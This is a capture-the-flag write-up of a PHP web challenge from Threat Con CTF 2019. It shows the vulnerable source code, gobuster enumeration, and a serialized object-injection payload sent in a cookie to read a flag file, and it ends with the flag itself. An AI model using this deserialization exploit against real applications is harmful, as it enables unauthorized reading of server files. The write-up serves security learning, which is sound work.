CyberTalents – Threat Con CTF 2019 – Online Now writeup

Threat Con CTF 2019

This was a 200-point challenge rated hard, and as far as I know only one person solved it during the event. I was a little disappointed that I could not finish it in time. Anyway, here is the writeup.

Let us begin with the URL. The challenge was hosted at http://35.224.115.104/onlinenow/ and looks as below:

online now home page

It just prints some information about us, i.e. our IP address and User-Agent.

Looking at the page source reveals a reference to a file called cache.php.

onlinenow source – cache.php

Browsing to http://35.224.115.104/onlinenow/libs/cache.php shows a blank white page. Nothing here.

But if we remove cache.php and browse to http://35.224.115.104/onlinenow/libs/ instead, directory listing is enabled and the contents of the folder are shown.

directory listing

Cool! From here we can download the .src files, which are the source code of start.php and cache.php.

After downloading them we can view the source code.

start.php.src

<?php
session_start();
define('InChallenge',true);
if(!isset($_SESSION['user'])){
    // First visit (no session yet): the cookie is only ever a serialized string here.
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    setcookie('user_info',serialize('IP = '.$ip.' , UA = '.$ua),time()+86400,"/");
    $_SESSION['user'] = 'guest';
}else{
    // Later visits (valid PHPSESSID): the cookie goes straight into unserialize(),
    // so any class that is loaded can be instantiated with attacker-chosen properties.
    if(isset($_COOKIE['user_info'])){
        $at = $_COOKIE['user_info'];
        $info = unserialize($at);
    }else{
        $info = 'Unknown';
    }
}

cache.php.src

<?php

class SessionClass
{
    public $user = 'guest';

    // unserialize() never calls __construct, so for an injected object
    // $user comes from the serialized data, not from $_SESSION.
    public function __construct()
    {
        $this->user = (isset($_SESSION['user'])) ? $_SESSION['user'] : 'guest';
    }

    // Builds the path from $user and $pageName and returns the file with
    // only the PHP tags and '//' stripped, i.e. the source as plain text.
    public function getCurrentPageContent($pageName)
    {
        return str_replace(['<?php','//','?>'],'',file_get_contents(__DIR__.'/../cache/'.$this->user.'/'.$pageName.'.php'));
    }
}

class Cache
{
    public $cachedFile = null;
    public $pageName = 'index';

    public function __construct($pageName)
    {
        $this->pageName = $pageName;
        $this->cachedFile = new SessionClass();
    }

    // Runs whenever the object is used as a string (e.g. echoed), which is
    // what turns an unserialized Cache into a file read.
    public function __toString()
    {
        //echo $this->pageName;
        if($this->cachedFile)
        {
            return $this->cachedFile->getCurrentPageContent($this->pageName);
        }
        return '';
    }
}

I will discuss the code later. I also ran gobuster to see whether there were any folders I was missing and found a /cache folder. Running gobuster again against /cache revealed two more folders.

# gobuster -u http://35.224.115.104/onlinenow/cache/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://35.224.115.104/onlinenow/cache/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/admin (Status: 301)
/guest (Status: 301)

Visiting the folders one by one, i.e. http://35.224.115.104/onlinenow/cache/admin/ and http://35.224.115.104/onlinenow/cache/guest/, simply greets us as below:

Hello Admin
Hello Visitor

That’s all I found about the challenge.

Now, back to the code. Looking at the source, this is a PHP Object Injection (look at Example 2). The user_info cookie is passed to unserialize() on every request that already has a session, and unserialize() will build any loaded class with whatever property values we supply, without calling its constructor. Cache::__toString() then calls SessionClass::getCurrentPageContent(), which reads cache/<user>/<pageName>.php and returns it with only the PHP tags stripped. So what we actually want to do is hand the application a Cache object whose SessionClass has user set to admin and whose pageName is flag, so that it reads the source of flag.php for us.

I created a payload to send in the user_info cookie to disclose the flag. I used Burp Suite to intercept the request and send it.

O:5:"Cache":2:{s:10:"cachedFile";O:12:"SessionClass":1:{s:4:"user";s:5:"admin";}s:8:"pageName";s:4:"flag";}

Here,
O:5:"Cache" => an object (O) whose class name is 5 characters long, Cache
:2: => the object has two properties
s:10:"cachedFile" => a string (s) of length 10, the property name cachedFile
and so on: the value of cachedFile is a nested O:12:"SessionClass" object with a single property user set to the 5-character string admin, followed by the pageName property set to flag. The length prefixes must match exactly or unserialize() fails.

If you would like to read more, you can go here.

Now URL-encode the payload (Ctrl+U in Burp) and send the GET request to http://35.224.115.104/onlinenow/.

request with payload

The server's response sets another cookie, PHPSESSID. This matters because start.php only unserializes user_info once $_SESSION['user'] exists, i.e. on a request that carries a valid session.

response with PHPSESSID

Now add that PHPSESSID cookie alongside our user_info cookie in the Cookie header and send another GET request.

another request

If everything went well, you will see the flag.

cybertalent onlinenow flag

The flag is !amTh3Adm!nFlag$$
